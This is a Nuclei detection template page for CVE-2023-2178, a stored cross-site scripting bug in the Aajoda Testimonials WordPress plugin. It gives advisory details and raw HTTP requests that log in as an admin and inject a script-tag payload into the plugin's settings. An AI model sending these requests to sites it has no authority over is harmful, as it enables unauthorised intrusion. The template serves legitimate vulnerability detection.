Skip to content

Aajoda Testimonials < 2.2.2 - Cross-Site Scripting

ID: CVE-2023-2178

Severity: medium

Author: Farish

Tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda

The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

id: CVE-2023-2178
info:
name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting
author: Farish
severity: medium
description: |
The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
- https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip
- https://nvd.nist.gov/vuln/detail/CVE-2023-2178
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2023-2178
cwe-id: CWE-79
epss-score: 0.00078
epss-percentile: 0.33655
cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: aajoda
product: aajoda_testimonials
framework: wordpress
tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "></textarea><script>alert(document.domain)</script>")'
- 'contains(body_2, "page_aajoda-testimonials")'
condition: and
# digest: 490a0046304402205223ea499184bb51fbb3dd15462c8fe0c6db59597bad174c581f0da86d86dc23022058d8c894c93c98a53af12bd81f813d1cc8deb4dc1dece33f9f5e90d7d1f3862f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2178.yaml"

View on Github